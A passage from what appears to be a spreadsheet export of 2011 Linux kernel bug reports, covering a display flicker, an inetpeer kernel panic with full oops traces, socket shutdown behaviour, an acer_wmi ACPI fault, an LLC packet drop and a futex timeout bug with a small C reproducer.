could be freed by ath5k_eeprom_free_pcal_info() but this function is not called in this case. Not a critical problem, it seems, but still.</t>
  </si>
  <si>
    <t>Booting with external monitor attached results in red flickering screen on the external monitor</t>
  </si>
  <si>
    <t>2011-04-06 04:50 UTC</t>
  </si>
  <si>
    <t>2011-05-14 22:21 UTC</t>
  </si>
  <si>
    <t>It's started here: http://forums.gentoo.org/viewtopic-t-866955-highlight-.html Thinkpad x201 00:02.0 VGA compatible controller: Intel Corporation Core Processor Integrated Graphics Controller (rev 02) kernel 2.6.38-2.6.38.2 x11-drivers/xf86-video-intel-{2.14.0 | 2.14.902} in KVM mode So, once again, the bug does not appear immediately. A computer boots up normally and xdm starts xorg (both screens runs in lower laptop mode). An external monitor becomes flickering red after a login (I use gnome) then a gnome display manager (?) switches monitors to the previous state which is: laptop off, external monitor on It was working fine with all previous kernels including 2.6.37 emerge --info Portage 2.1.9.42 (default/linux/x86/10.0/desktop/gnome, gcc-4.4.5, glibc-2.11.3-r0, 2.6.37-gentoo-r3 i686) ================================================================= System uname: Linux-2.6.37-gentoo-r3-i686-Intel-R-_Core-TM-_i5_CPU_M_520_@_2.40GHz-with-gentoo-2.0.2 Timestamp of tree: Wed, 06 Apr 2011 00:45:01 +0000 app-shells/bash: 4.1_p9 dev-java/java-config: 2.1.11-r3 dev-lang/python: 2.6.6-r2, 3.1.3-r1 dev-util/cmake: 2.8.1-r2 sys-apps/baselayout: 2.0.2 sys-apps/openrc: 0.7.0::pentoo sys-apps/sandbox: 2.4 sys-devel/autoconf: 2.65-r1 sys-devel/automake: 1.9.6-r3, 1.10.3, 1.11.1 sys-devel/binutils: 2.20.1-r1 sys-devel/gcc: 4.4.5 sys-devel/gcc-config: 1.4.1 sys-devel/libtool: 2.2.10 sys-devel/make: 3.81-r2 virtual/os-headers: 2.6.36.1 (sys-kernel/linux-headers) ACCEPT_KEYWORDS="x86" ACCEPT_LICENSE="* -@EULA PUEL AdobeFlash-10.1" CBUILD="i686-pc-linux-gnu" CFLAGS="-march=native -O2 -fomit-frame-pointer -pipe" CHOST="i686-pc-linux-gnu" CONFIG_PROTECT="/etc /usr/share/gnupg/qualified.txt" CONFIG_PROTECT_MASK="/etc/ca-certificates.conf /etc/env.d /etc/env.d/java/ /etc/eselect/postgresql /etc/fonts/fonts.conf /etc/gconf /etc/gentoo-release /etc/php/apache2-php5.3/ext-active/ /etc/php/cgi-php5.3/ext-active/ /etc/php/cli-php5.3/ext-active/ /etc/revdep-rebuild /etc/sandbox.d /etc/terminfo" CXXFLAGS="-march=native -O2 -fomit-frame-pointer -pipe" DISTDIR="/usr/portage/distfiles" FEATURES="assume-digests binpkg-logs distlocks fixlafiles fixpackages news parallel-fetch protect-owned sandbox sfperms strict unknown-features-warn unmerge-logs unmerge-orphans userfetch" FFLAGS="" GENTOO_MIRRORS="http://distfiles.gentoo.org" LANG="C" LDFLAGS="-Wl,-O1 -Wl,--as-needed" LINGUAS="en ru" MAKEOPTS="-j5" PKGDIR="/usr/portage/packages" PORTAGE_CONFIGROOT="/" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" PORTDIR_OVERLAY="/var/lib/layman/vmware /var/lib/layman/ikelos /usr/local/portage /pentoo" SYNC="rsync://rsync.sg.gentoo.org/gentoo-portage" USE="X a52 aac acl acpi alsa avahi bash-completion berkdb branding bzip2 cairo cdr cli consolekit cracklib crypt cxx dbus dri dts dvd dvdr eds emboss encode evo exif fam firefox flac fortran gdbm gdu gif gnome gnome-keyring gstreamer gtk iconv ipv6 java jpeg lcms libnotify mad mikmod mng modules mp3 mp4 mpeg mudflap nautilus ncurses networkmanager nls nptl nptlonly ogg opengl openmp pam pango pcre pdf perl png policykit ppds pppd python qt3support qt4 readline samba sdl session spell ssl startup-notification svg sysfs tcpd tiff truetype udev unicode usb vaapi vorbis x264 x86 xcb xml xorg xv xvid zlib" ALSA_CARDS="ali5451 als4000 atiixp atiixp-modem bt87x ca0106 cmipci emu10k1 emu10k1x ens1370 ens1371 es1938 es1968 fm801 hda-intel intel8x0 intel8x0m maestro3 trident usb-audio via82xx via82xx-modem ymfpci" ALSA_PCM_PLUGINS="adpcm alaw asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa lfloat linear meter mmap_emul mulaw multi null plug rate route share shm softvol" APACHE2_MODULES="actions alias auth_basic authn_alias authn_anon authn_dbm authn_default authn_file authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache cgi cgid dav dav_fs dav_lock deflate dir disk_cache env expires ext_filter file_cache filter headers include info log_config logio mem_cache mime mime_magic negotiation rewrite setenvif speling status unique_id userdir usertrack vhost_alias" CAMERAS="ptp2" COLLECTD_PLUGINS="df interface irq load memory rrdtool swap syslog" ELIBC="glibc" GPSD_PROTOCOLS="ashtech aivdm earthmate evermore fv18 garmin garmintxt gpsclock itrax mtk3301 nmea ntrip navcom oceanserver oldstyle oncore rtcm104v2 rtcm104v3 sirf superstar2 timing tsip tripmate tnt ubx" INPUT_DEVICES="evdev keyboard mouse synaptics" KERNEL="linux" LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LINGUAS="en ru" PHP_TARGETS="php5-3" RUBY_TARGETS="ruby18" USERLAND="GNU" VIDEO_CARDS="vesa intel" XTABLES_ADDONS="quota2 psd pknock lscan length2 ipv4options ipset ipp2p iface geoip fuzzy condition tee tarpit sysrq steal rawnat logmark ipmark dhcpmac delude chaos account" Unset: CPPFLAGS, CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LC_ALL, PORTAGE_BUNZIP2_COMMAND, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS</t>
  </si>
  <si>
    <t>PROBLEM: kernel BUG at net/ipv4/inetpeer.c:386</t>
  </si>
  <si>
    <t>2011-04-06 07:39 UTC</t>
  </si>
  <si>
    <t>Dmitry Novikov</t>
  </si>
  <si>
    <t>Kernel oopses periodically with 'kernel BUG at net/ipv4/inetpeer.c:386' message. Machine is used as BGP router and runs Quagga. Nonordinary kernel config option set: CONFIG_IP_FIB_TRIE=y. Two traces: --------------------trace begin-------------- [625279.329241] kernel BUG at net/ipv4/inetpeer.c:386! [625279.329241] invalid opcode: 0000 [#1] SMP [625279.329241] last sysfs file: /sys/module/ip_tables/initstate [625279.329241] Modules linked in: nf_nat_pptp nf_nat_proto_gre nf_conntrack_pptp nf_conntrack_proto_gre nf_nat_ftp nf_conntrack_ftp ipt_REJECT xt_state xt_tcpudp xt_multiport ip_set iptable_filter iptable_mangle iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables x_tables act_police cls_u32 sch_ingress sch_tbf 8021q garp bridge ipv6 stp llc loop i2c_i801 intel_agp parport_pc i2c_core intel_gtt rng_core agpgart processor parport button evdev pcspkr thermal_sys serio_raw tpm_tis tpm tpm_bios ext3 jbd mbcache sd_mod crc_t10dif ata_generic ata_piix libata scsi_mod uhci_hcd ide_pci_generic e1000e ehci_hcd r8169 ide_core igb dca mii usbcore nls_base [last unloaded: scsi_wait_scan] [625279.329241] [625279.329241] Pid: 0, comm: kworker/0:0 Not tainted 2.6.38-demyan-1.1demyan #1 Gigabyte Technology Co., Ltd. G41MT-ES2L/G41MT-ES2L [625279.329241] EIP: 0060:[&lt;c11e0caa&gt;] EFLAGS: 00010283 CPU: 1 [625279.329241] EIP is at unlink_from_pool+0x85/0x14a [625279.329241] EAX: c125ff04 EBX: ed21cd40 ECX: c351ce70 EDX: e8db5b40 [625279.329241] ESI: c1333338 EDI: f4c91ca0 EBP: c351b55e ESP: f4c91c48 [625279.329241] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [625279.329241] Process kworker/0:0 (pid: 0, ti=f4c90000 task=f4c6a400 task.ti=f4c8c000) [625279.329241] Stack: [625279.329241] f1be9b00 00000001 c351ce70 c133333c c1333338 ed21a684 f11a3f84 f0146f00 [625279.329241] ed2dca80 ed21a900 f0146644 ec4c2f40 f0146280 ec701dc0 f0467fc0 eea79604 [625279.329241] f16c12c0 ef727900 ec865784 e721a3c0 ee859cc4 e8db5b40 00000640 00000014 [625279.329241] Call Trace: [625279.329241] [&lt;c11ea34a&gt;] ? tcp_tso_segment+0x24d/0x25c [625279.329241] [&lt;f820048a&gt;] ? tcp_packet+0xb8e/0xbb8 [nf_conntrack] [625279.329241] [&lt;c11e0de9&gt;] ? cleanup_once+0x7a/0x7f [625279.329241] [&lt;c11e0fa9&gt;] ? inet_getpeer+0x1bb/0x1dc [625279.329241] [&lt;c11d0001&gt;] ? store_xps_map+0xa1/0x2b8 [625279.329241] [&lt;c11c3477&gt;] ? dev_hard_start_xmit+0x36f/0x454 [625279.329241] [&lt;c1021ef1&gt;] ? get_nohz_timer_target+0x47/0x64 [625279.329241] [&lt;c11e1cb0&gt;] ? ip4_frag_init+0x66/0x71 [625279.329241] [&lt;c120bb54&gt;] ? inet_frag_find+0x80/0x18d [625279.329241] [&lt;c11e1dec&gt;] ? ip_defrag+0x131/0x955 [625279.329241] [&lt;f81be0b1&gt;] ? ipv4_conntrack_defrag+0xb0/0xd3 [nf_defrag_ipv4] [625279.329241] [&lt;c11dc036&gt;] ? nf_iterate+0x32/0x5d [625279.329241] [&lt;c11e10e0&gt;] ? ip_rcv_finish+0x0/0x31f [625279.329241] [&lt;c11dc13d&gt;] ? nf_hook_slow+0x40/0xb5 [625279.329241] [&lt;c11e10e0&gt;] ? ip_rcv_finish+0x0/0x31f [625279.329241] [&lt;c11e164c&gt;] ? ip_rcv+0x24d/0x293 [625279.329241] [&lt;c11e10e0&gt;] ? ip_rcv_finish+0x0/0x31f [625279.329241] [&lt;c11c1b3c&gt;] ? __netif_receive_skb+0x405/0x42c [625279.329241] [&lt;c11c1a63&gt;] ? __netif_receive_skb+0x32c/0x42c [625279.329241] [&lt;c1047585&gt;] ? ktime_get_real+0x10/0x2d [625279.329241] [&lt;c11c2547&gt;] ? netif_receive_skb+0x5a/0x5f [625279.329241] [&lt;c11c25ff&gt;] ? napi_skb_finish+0x1b/0x30 [625279.329241] [&lt;f80a9723&gt;] ? igb_poll+0x649/0x94a [igb] [625279.329241] [&lt;c1007765&gt;] ? sched_clock+0x9/0xd [625279.329241] [&lt;c1030582&gt;] ? do_exit+0x2e/0x60c [625279.329241] [&lt;c104438f&gt;] ? sched_clock_local+0x17/0x13d [625279.329241] [&lt;c11c2b7b&gt;] ? net_rx_action+0x90/0x150 [625279.329241] [&lt;c1031f12&gt;] ? __do_softirq+0x75/0x10e [625279.329241] [&lt;c1031e9d&gt;] ? __do_softirq+0x0/0x10e [625279.329241] &lt;IRQ&gt; [625279.329241] [&lt;c1031df3&gt;] ? irq_exit+0x31/0x64 [625279.329241] [&lt;c1004397&gt;] ? do_IRQ+0x73/0x84 [625279.329241] [&lt;c1003429&gt;] ? common_interrupt+0x29/0x30 [625279.329241] [&lt;c10089b4&gt;] ? mwait_idle+0x4f/0x59 [625279.329241] [&lt;c10021ef&gt;] ? cpu_idle+0x46/0x63 [625279.329241] Code: 24 08 39 cd 75 09 42 3b 54 24 04 7c e9 eb 18 3b 6c 24 08 8d 50 04 0f 42 d0 89 17 83 c7 04 8b 02 3d 04 ff 25 c1 75 bb 39 d8 74 04 &lt;0f&gt; 0b eb fe 8d 6f fc 81 3b 04 ff 25 c1 89 6c 24 08 75 0d 8b 47 [625279.329241] EIP: [&lt;c11e0caa&gt;] unlink_from_pool+0x85/0x14a SS:ESP 0068:f4c91c48 [625280.416294] ---[ end trace b75ce593ad6cbee7 ]--- [625280.430422] Kernel panic - not syncing: Fatal exception in interrupt [625280.449739] Pid: 0, comm: kworker/0:0 Tainted: G D 2.6.38-demyan-1.1demyan #1 [625280.473762] Call Trace: [625280.481380] [&lt;c1231f71&gt;] ? panic+0x4d/0x137 [625280.494457] [&lt;c1005722&gt;] ? oops_end+0x8e/0x99 [625280.508054] [&lt;c1003a0e&gt;] ? do_invalid_op+0x0/0x75 [625280.522693] [&lt;c1003a7a&gt;] ? do_invalid_op+0x6c/0x75 [625280.537588] [&lt;c11e0caa&gt;] ? unlink_from_pool+0x85/0x14a [625280.553527] [&lt;c11e0bbd&gt;] ? inet_putpeer+0x15/0x47 [625280.568165] [&lt;c11e0d64&gt;] ? unlink_from_pool+0x13f/0x14a [625280.584367] [&lt;f80a9ed6&gt;] ? igb_xmit_frame_ring_adv+0x4b2/0x795 [igb] [625280.603941] [&lt;c1007765&gt;] ? sched_clock+0x9/0xd [625280.617797] [&lt;c123464e&gt;] ? error_code+0x5a/0x60 [625280.631913] [&lt;c1003a0e&gt;] ? do_invalid_op+0x0/0x75 [625280.646552] [&lt;c11e0caa&gt;] ? unlink_from_pool+0x85/0x14a [625280.662490] [&lt;c11ea34a&gt;] ? tcp_tso_segment+0x24d/0x25c [625280.678427] [&lt;f820048a&gt;] ? tcp_packet+0xb8e/0xbb8 [nf_conntrack] [625280.696964] [&lt;c11e0de9&gt;] ? cleanup_once+0x7a/0x7f [625280.711600] [&lt;c11e0fa9&gt;] ? inet_getpeer+0x1bb/0x1dc [625280.726758] [&lt;c11d0001&gt;] ? store_xps_map+0xa1/0x2b8 [625280.741916] [&lt;c11c3477&gt;] ? dev_hard_start_xmit+0x36f/0x454 [625280.758894] [&lt;c1021ef1&gt;] ? get_nohz_timer_target+0x47/0x64 [625280.775870] [&lt;c11e1cb0&gt;] ? ip4_frag_init+0x66/0x71 [625280.790768] [&lt;c120bb54&gt;] ? inet_frag_find+0x80/0x18d [625280.806184] [&lt;c11e1dec&gt;] ? ip_defrag+0x131/0x955 [625280.820562] [&lt;f81be0b1&gt;] ? ipv4_conntrack_defrag+0xb0/0xd3 [nf_defrag_ipv4] [625280.841961] [&lt;c11dc036&gt;] ? nf_iterate+0x32/0x5d [625280.856078] [&lt;c11e10e0&gt;] ? ip_rcv_finish+0x0/0x31f [625280.870975] [&lt;c11dc13d&gt;] ? nf_hook_slow+0x40/0xb5 [625280.885612] [&lt;c11e10e0&gt;] ? ip_rcv_finish+0x0/0x31f [625280.900510] [&lt;c11e164c&gt;] ? ip_rcv+0x24d/0x293 [625280.914107] [&lt;c11e10e0&gt;] ? ip_rcv_finish+0x0/0x31f [625280.929005] [&lt;c11c1b3c&gt;] ? __netif_receive_skb+0x405/0x42c [625280.945982] [&lt;c11c1a63&gt;] ? __netif_receive_skb+0x32c/0x42c [625280.962960] [&lt;c1047585&gt;] ? ktime_get_real+0x10/0x2d [625280.978121] [&lt;c11c2547&gt;] ? netif_receive_skb+0x5a/0x5f [625280.994055] [&lt;c11c25ff&gt;] ? napi_skb_finish+0x1b/0x30 [625281.009473] [&lt;f80a9723&gt;] ? igb_poll+0x649/0x94a [igb] [625281.025150] [&lt;c1007765&gt;] ? sched_clock+0x9/0xd [625281.039005] [&lt;c1030582&gt;] ? do_exit+0x2e/0x60c [625281.052603] [&lt;c104438f&gt;] ? sched_clock_local+0x17/0x13d [625281.068800] [&lt;c11c2b7b&gt;] ? net_rx_action+0x90/0x150 [625281.083958] [&lt;c1031f12&gt;] ? __do_softirq+0x75/0x10e [625281.098857] [&lt;c1031e9d&gt;] ? __do_softirq+0x0/0x10e [625281.113493] &lt;IRQ&gt; [&lt;c1031df3&gt;] ? irq_exit+0x31/0x64 [625281.128963] [&lt;c1004397&gt;] ? do_IRQ+0x73/0x84 [625281.142040] [&lt;c1003429&gt;] ? common_interrupt+0x29/0x30 [625281.157718] [&lt;c10089b4&gt;] ? mwait_idle+0x4f/0x59 [625281.171836] [&lt;c10021ef&gt;] ? cpu_idle+0x46/0x63 [625281.185435] Rebooting in 5 seconds.. --------------------trace end-------------- --------------------trace begin-------------- [237684.673906] kernel BUG at net/ipv4/inetpeer.c:386! [237684.673906] invalid opcode: 0000 [#1] SMP [237684.673906] last sysfs file: /sys/module/nf_conntrack_pptp/initstate [237684.673906] Modules linked in: nf_nat_pptp nf_nat_proto_gre nf_conntrack_pptp nf_conntrack_proto_gre nf_nat_ftp nf_conntrack_ftp ipt_REJECT xt_state xt_tcpudp xt_multiport ip_set iptable_filter iptable_mangle iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables x_tables act_police cls_u32 sch_ingress sch_tbf 8021q garp bridge ipv6 stp llc loop i2c_i801 rng_core intel_agp intel_gtt agpgart i2c_core tpm_tis evdev pcspkr parport_pc processor parport button tpm thermal_sys tpm_bios serio_raw ext3 jbd mbcache sd_mod crc_t10dif ata_generic ata_piix libata scsi_mod uhci_hcd ide_pci_generic r8169 ehci_hcd e1000e mii igb dca ide_core usbcore nls_base [last unloaded: scsi_wait_scan] [237684.673906] [237684.673906] Pid: 0, comm: swapper Not tainted 2.6.38-demyan-1.1demyan #1 Gigabyte Technology Co., Ltd. G41MT-ES2L/G41MT-ES2L [237684.673906] EIP: 0060:[&lt;c11e0caa&gt;] EFLAGS: 00010287 CPU: 0 [237684.673906] EIP is at unlink_from_pool+0x85/0x14a [237684.673906] EAX: c125ff04 EBX: ed76d180 ECX: 75c219bc EDX: e8de9444 [237684.673906] ESI: c1333338 EDI: f4c0bbfc EBP: 75c25152 ESP: f4c0bba8 [237684.673906] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [237684.673906] Process swapper (pid: 0, ti=f4c0a000 task=c1315f20 task.ti=c1300000) [237684.673906] Stack: [237684.673906] ef42e49c 00000001 75c219bc c133333c c1333338 f4780d80 ed76d744 f19e3744 [237684.673906] ed71f980 f452a404 f183fc04 f452afc4 f4780ac0 f18ca680 f474fe84 f1871180 [237684.673906] ee2a9884 edef3844 f1cf3e04 edf15284 e8de9444 f4c0bcb4 ef42e49c f4c0bc78 [237684.673906] Call Trace: [237684.673906] [&lt;c120f068&gt;] ? fib4_rule_action+0x40/0x4d [237684.673906] [&lt;c11d1be3&gt;] ? fib_rules_lookup+0x8d/0xe4 [237684.673906] [&lt;c109bf68&gt;] ? cache_alloc_refill+0x75/0x3dc [237684.673906] [&lt;c11e0de9&gt;] ? cleanup_once+0x7a/0x7f [237684.673906] [&lt;c11e0fa9&gt;] ? inet_getpeer+0x1bb/0x1dc [237684.673906] [&lt;c11dc073&gt;] ? nf_ct_attach+0x12/0x13 [237684.673906] [&lt;c1202404&gt;] ? icmp_glue_bits+0x65/0x6a [237684.673906] [&lt;c11e4109&gt;] ? ip_append_data+0x595/0x850 [237684.673906] [&lt;c11e025d&gt;] ? rt_bind_peer+0x1d/0x3d [237684.673906] [&lt;c11e029f&gt;] ? __ip_select_ident+0x22/0xa6 [237684.673906] [&lt;c11e4f60&gt;] ? ip_push_pending_frames+0x206/0x2cb [237684.673906] [&lt;c120301b&gt;] ? icmp_send+0x4fe/0x523 [237684.673906] [&lt;f8270b09&gt;] ? ____nf_conntrack_find+0xfa/0x142 [nf_conntrack] [237684.673906] [&lt;f8272069&gt;] ? nf_conntrack_in+0x4f3/0x5e3 [nf_conntrack] [237684.673906] [&lt;f81ef536&gt;] ? ipt_do_table+0x4bc/0x4eb [ip_tables] [237684.673906] [&lt;c11e2949&gt;] ? ip_forward+0x2ef/0x316 [237684.673906] [&lt;c11e13da&gt;] ? ip_rcv_finish+0x2fa/0x31f [237684.673906] [&lt;c11c1b3c&gt;] ? __netif_receive_skb+0x405/0x42c [237684.673906] [&lt;c11c1a63&gt;] ? __netif_receive_skb+0x32c/0x42c [237684.673906] [&lt;c1047585&gt;] ? ktime_get_real+0x10/0x2d [237684.673906] [&lt;c11c2547&gt;] ? netif_receive_skb+0x5a/0x5f [237684.673906] [&lt;c11c25ff&gt;] ? napi_skb_finish+0x1b/0x30 [237684.673906] [&lt;f80e1723&gt;] ? igb_poll+0x649/0x94a [igb] [237684.673906] [&lt;c1007765&gt;] ? sched_clock+0x9/0xd [237684.673906] [&lt;c1030091&gt;] ? wait_consider_task+0x974/0xa91 [237684.673906] [&lt;c104438f&gt;] ? sched_clock_local+0x17/0x13d [237684.673906] [&lt;c11c2b7b&gt;] ? net_rx_action+0x90/0x150 [237684.673906] [&lt;c1031f12&gt;] ? __do_softirq+0x75/0x10e [237684.673906] [&lt;c1031e9d&gt;] ? __do_softirq+0x0/0x10e [237684.673906] &lt;IRQ&gt; [237684.673906] [&lt;c1031df3&gt;] ? irq_exit+0x31/0x64 [237684.673906] [&lt;c1004397&gt;] ? do_IRQ+0x73/0x84 [237684.673906] [&lt;c1003429&gt;] ? common_interrupt+0x29/0x30 [237684.673906] [&lt;c10089b4&gt;] ? mwait_idle+0x4f/0x59 [237684.673906] [&lt;c10021ef&gt;] ? cpu_idle+0x46/0x63 [237684.673906] [&lt;c133b85c&gt;] ? start_kernel+0x2e2/0x2e5 [237684.673906] Code: 24 08 39 cd 75 09 42 3b 54 24 04 7c e9 eb 18 3b 6c 24 08 8d 50 04 0f 42 d0 89 17 83 c7 04 8b 02 3d 04 ff 25 c1 75 bb 39 d8 74 04 &lt;0f&gt; 0b eb fe 8d 6f fc 81 3b 04 ff 25 c1 89 6c 24 08 75 0d 8b 47 [237684.673906] EIP: [&lt;c11e0caa&gt;] unlink_from_pool+0x85/0x14a SS:ESP 0068:f4c0bba8 [237685.787747] ---[ end trace e3c73323a4e3b283 ]--- [237685.801876] Kernel panic - not syncing: Fatal exception in interrupt [237685.821194] Pid: 0, comm: swapper Tainted: G D 2.6.38-demyan-1.1demyan #1 [237685.844177] Call Trace: [237685.851797] [&lt;c1231f71&gt;] ? panic+0x4d/0x137 [237685.864874] [&lt;c1005722&gt;] ? oops_end+0x8e/0x99 [237685.878471] [&lt;c1003a0e&gt;] ? do_invalid_op+0x0/0x75 [237685.893109] [&lt;c1003a7a&gt;] ? do_invalid_op+0x6c/0x75 [237685.908005] [&lt;c11e0caa&gt;] ? unlink_from_pool+0x85/0x14a [237685.923942] [&lt;c1007765&gt;] ? sched_clock+0x9/0xd [237685.937801] [&lt;c1007765&gt;] ? sched_clock+0x9/0xd [237685.951658] [&lt;c104438f&gt;] ? sched_clock_local+0x17/0x13d [237685.967856] [&lt;c123464e&gt;] ? error_code+0x5a/0x60 [237685.981973] [&lt;c1003a0e&gt;] ? do_invalid_op+0x0/0x75 [237685.996610] [&lt;c11e0caa&gt;] ? unlink_from_pool+0x85/0x14a [237686.012548] [&lt;c120f068&gt;] ? fib4_rule_action+0x40/0x4d [237686.028225] [&lt;c11d1be3&gt;] ? fib_rules_lookup+0x8d/0xe4 [237686.043902] [&lt;c109bf68&gt;] ? cache_alloc_refill+0x75/0x3dc [237686.060359] [&lt;c11e0de9&gt;] ? cleanup_once+0x7a/0x7f [237686.074997] [&lt;c11e0fa9&gt;] ? inet_getpeer+0x1bb/0x1dc [237686.090156] [&lt;c11dc073&gt;] ? nf_ct_attach+0x12/0x13 [237686.104792] [&lt;c1202404&gt;] ? icmp_glue_bits+0x65/0x6a [237686.119949] [&lt;c11e4109&gt;] ? ip_append_data+0x595/0x850 [237686.135626] [&lt;c11e025d&gt;] ? rt_bind_peer+0x1d/0x3d [237686.150264] [&lt;c11e029f&gt;] ? __ip_select_ident+0x22/0xa6 [237686.166202] [&lt;c11e4f60&gt;] ? ip_push_pending_frames+0x206/0x2cb [237686.183959] [&lt;c120301b&gt;] ? icmp_send+0x4fe/0x523 [237686.198338] [&lt;f8270b09&gt;] ? ____nf_conntrack_find+0xfa/0x142 [nf_conntrack] [237686.219474] [&lt;f8272069&gt;] ? nf_conntrack_in+0x4f3/0x5e3 [nf_conntrack] [237686.239311] [&lt;f81ef536&gt;] ? ipt_do_table+0x4bc/0x4eb [ip_tables] [237686.257589] [&lt;c11e2949&gt;] ? ip_forward+0x2ef/0x316 [237686.272227] [&lt;c11e13da&gt;] ? ip_rcv_finish+0x2fa/0x31f [237686.287643] [&lt;c11c1b3c&gt;] ? __netif_receive_skb+0x405/0x42c [237686.304620] [&lt;c11c1a63&gt;] ? __netif_receive_skb+0x32c/0x42c [237686.321599] [&lt;c1047585&gt;] ? ktime_get_real+0x10/0x2d [237686.336760] [&lt;c11c2547&gt;] ? netif_receive_skb+0x5a/0x5f [237686.352692] [&lt;c11c25ff&gt;] ? napi_skb_finish+0x1b/0x30 [237686.368111] [&lt;f80e1723&gt;] ? igb_poll+0x649/0x94a [igb] [237686.383788] [&lt;c1007765&gt;] ? sched_clock+0x9/0xd [237686.397645] [&lt;c1030091&gt;] ? wait_consider_task+0x974/0xa91 [237686.414362] [&lt;c104438f&gt;] ? sched_clock_local+0x17/0x13d [237686.430559] [&lt;c11c2b7b&gt;] ? net_rx_action+0x90/0x150 [237686.445718] [&lt;c1031f12&gt;] ? __do_softirq+0x75/0x10e [237686.460614] [&lt;c1031e9d&gt;] ? __do_softirq+0x0/0x10e [237686.475251] &lt;IRQ&gt; [&lt;c1031df3&gt;] ? irq_exit+0x31/0x64 [237686.490722] [&lt;c1004397&gt;] ? do_IRQ+0x73/0x84 [237686.503799] [&lt;c1003429&gt;] ? common_interrupt+0x29/0x30 [237686.519476] [&lt;c10089b4&gt;] ? mwait_idle+0x4f/0x59 [237686.533593] [&lt;c10021ef&gt;] ? cpu_idle+0x46/0x63 [237686.547191] [&lt;c133b85c&gt;] ? start_kernel+0x2e2/0x2e5 [237686.562350] Rebooting in 5 seconds.. --------------------trace end--------------</t>
  </si>
  <si>
    <t>shutdown(2) does not fully shut down socket any more</t>
  </si>
  <si>
    <t>2011-04-06 22:42 UTC</t>
  </si>
  <si>
    <t>2014-05-04 01:48 UTC</t>
  </si>
  <si>
    <t>In 2.6.35 and earlier, shutdown(2) will fully remove a socket. This does not appear to be true any more and is causing software to misbehave. 2.6.35: $ ./testcase parent: 5957 before: tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN after: child: 5961 $ ./testcase parent: 6001 before: tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN after: child: 6002 2.6.38: $ ./testcase parent: 1138 before: tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN after: child: 1142 $ ./testcase bind: Address already in use The listener doesn't show up in netstat any more, but as long as the child process is running, the socket is unavailable. It is as if the shutdown(2) behavior has partially reverted to close(2) behavior (but in the case of using close(2), the child's socket would remain visible in netstat).</t>
  </si>
  <si>
    <t>acer_wmi partially crashes ACPI/EC (Aspire 8930G)</t>
  </si>
  <si>
    <t>2.6.38-gentoo-r1</t>
  </si>
  <si>
    <t>2011-04-07 17:44 UTC</t>
  </si>
  <si>
    <t>2011-05-30 08:36 UTC</t>
  </si>
  <si>
    <t>laptop model: Acer Aspire 8930G When the acer-wmi module is loaded, parts of ACPI go haywire. The immediate symptom is that backlight control stops working, logging messages like the following: kernel: ACPI Error: Method parse/execution failed [\_SB_.PCI0.PEGP.EVGA.LCD_._BCM] (Node ffff88013fc2b820), AE_AML_INFINITE_LOOP (20110112/psparse-536) kernel: ACPI Error: Evaluating _BCM failed (20110112/video-365) ACPI: Failed to switch the brightness I suspect it's waiting for some kind of state from the EC which never arrives. Not loading acer_wmi solves the issue and brightness control works since that uses the ACPI video driver anyway (however, this might have other negative consequences regarding e.g. rfkill as others have mentioned before). However, the issue is more severe than this. After shutting down and restarting the computer, or rebooting, the machine hangs during POST with no video and no backlight. This persists even if more reboots are attempted. The only way to clear this state is to disconnect AC power, and remove the battery. This is why I suspect the EC is hanging. acer-wmi on 2.6.37-gentoo didn't have these issues.</t>
  </si>
  <si>
    <t>LLC PDU is dropped if skb is not linear</t>
  </si>
  <si>
    <t>2011-04-08 09:52 UTC</t>
  </si>
  <si>
    <t>Vitaly V. Bursov</t>
  </si>
  <si>
    <t>2011-04-27 06:26 UTC</t>
  </si>
  <si>
    <t>If skb consists of several fragments this check fails net/llc/llc_input.c: ============================================= llc_fixup_skb() ... pdu = (struct llc_pdu_un *)skb-&gt;data; ... __be16 pdulen = eth_hdr(skb)-&gt;h_proto; s32 data_size = ntohs(pdulen) - llc_len; if (data_size &lt; 0 || ((skb_tail_pointer(skb) - (u8 *)pdu) - llc_len) &lt; data_size) return 0; ============================================= and packet is silently dropped. This breaks GVRP protocol if received packet is large ( &gt; 512 bytes on my system) and contains a Leave All message. Since Leave All is missed, corresponding JoinIns are not sent and switch unregisters VLANs from port. Attached patch seems to resolve this issue, but I don't know if it's a correct solution.</t>
  </si>
  <si>
    <t>futex_wait() may ignore the timeout if interrupted by a signal</t>
  </si>
  <si>
    <t>2011-04-09 01:34 UTC</t>
  </si>
  <si>
    <t>Tim Smith</t>
  </si>
  <si>
    <t>Darren Hart</t>
  </si>
  <si>
    <t>Created attachment 53882 [details] Fixes a bug in futex_wait() that causes timeouts to be ignored I noticed after starting a program from an xterm and trying to put it in the background that it would not resume. In kernel/futex.c line 1889 restart-&gt;futex.flags needs FLAGS_HAS_TIMEOUT or the timeout gets ignored after futex_wait() is interrupted by a signal. The code below triggers it on my Slackware64 13.1 system (glibc-2.11.1). #include &lt;stdio.h&gt; #include &lt;pthread.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/types.h&gt; #include &lt;signal.h&gt; int main (void) { pthread_condattr_t ca; pthread_mutex_t mut = PTHREAD_MUTEX_INITIALIZER; pthread_cond_t cv; struct timespec ts; pid_t p; int i; if ( (p = fork()) != 0 ) { printf("Child is running\n"); sleep(3); kill(p, SIGSTOP); printf("Child is stopped\n"); sleep(3); kill(p, SIGCONT); printf("Child should have resumed\n"); sleep(3); kill(p, SIGINT); return 0; } pthread_condattr_init(&amp;ca); pthread_condattr_setclock(&amp;ca, CLOCK_MONOTONIC); pthread_cond_init(&amp;cv, &amp;ca); while(1) { 